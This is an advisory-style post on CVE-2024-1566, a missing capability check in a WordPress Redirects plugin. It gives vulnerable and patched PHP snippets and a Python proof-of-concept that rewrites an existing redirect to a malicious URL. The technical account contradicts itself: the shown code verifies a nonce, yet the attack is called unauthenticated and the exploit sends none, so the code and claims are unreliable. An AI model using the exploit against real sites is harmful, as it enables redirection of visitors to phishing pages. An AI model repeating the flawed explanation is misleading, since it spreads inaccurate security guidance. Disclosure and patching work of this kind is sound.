A newly discovered security vulnerability (CVE-2024-1566) has been identified in the Redirects plugin for WordPress, affecting all versions up to, and including, 1.2.1. This vulnerability allows unauthenticated attackers to perform unauthorized data modification, potentially leading to unexpected redirections to phishing sites or malicious web pages. WordPress website owners using the Redirects plugin should take immediate action to secure their sites by updating to a patched version of the plugin or implementing mitigation strategies outlined below.

Technical Details

The vulnerability lies within the save() function of the Redirects plugin for WordPress, which does not properly check the user's capability before executing. This omission allows unauthenticated attackers to bypass the authentication process and change redirects created with the plugin.

Below is the affected code snipplet

public function save() {
    $nonce = isset( $_REQUEST['_wpnonce'] ) ? $_REQUEST['_wpnonce'] : '';

    if ( ! wp_verify_nonce( $nonce, 'my_redirects' ) ) {
        return false;
    }

    // Missing capability check
    ...

    // Save the redirect data
    ...
}

The problem becomes evident when inspecting the development guidelines for WordPress, stating that a proper capability check should be done before allowing users to edit content. You can read more about the capability check in the WordPress Codex.

Exploit

An attacker can exploit this vulnerability by sending a malicious HTTP POST request to the vulnerable $ajax_action endpoint responsible for handling redirects in the plugin.

Example code to exploit the vulnerability

import requests

target_url = "https://your_wordpress_website.com/wp-admin/admin-ajax.php";

data = {
    "action": "SAVE_REDIRECT_ACTION_NAME",
    "redirect_id": "EXISTING_REDIRECT_ID",
    "redirect_url": "MALICIOUS_REDIRECT_URL"
}

response = requests.post(target_url, data=data)

if response.status_code == 200:
    print("Exploited successfully.")
else:
    print("Exploit failed.")

Mitigation

Users of the Redirects plugin for WordPress are advised to take the following steps to mitigate the risk of this vulnerability:

1. Update the plugin to the latest version (if available) to ensure you are running a version that has the necessary security patch applied.
2. If an updated version of the plugin is not available or you are unable/unwilling to update, you can implement a temporary fix by adding a proper capability check within the save() function of the plugin. Below is the modified code snipplet with the added capability check:

public function save() {
    $nonce = isset( $_REQUEST['_wpnonce'] ) ? $_REQUEST['_wpnonce'] : '';

    if ( ! wp_verify_nonce( $nonce, 'my_redirects' ) ) {
        return false;
    }

    // Added capability check
    if ( ! current_user_can( 'manage_options' ) ) {
        return false;
    }

    // Save the redirect data
    ...
}

After implementing the temporary fix, regularly check the plugin's official repository for the availability of an updated version with the security patch applied.

Conclusion

CVE-2024-1566 is a severe security vulnerability that affects the Redirects plugin for WordPress, leaving websites open to unauthorized data modification by unauthenticated attackers. It's crucial for website owners utilizing this plugin to take immediate actions to mitigate the risk associated with this vulnerability. By updating to the latest version of the plugin or implementing suggested mitigation steps, you can help protect your website and users from potential harm.

Timeline

Published on: 02/28/2024 09:15:43 UTC
Last modified on: 02/28/2024 14:06:45 UTC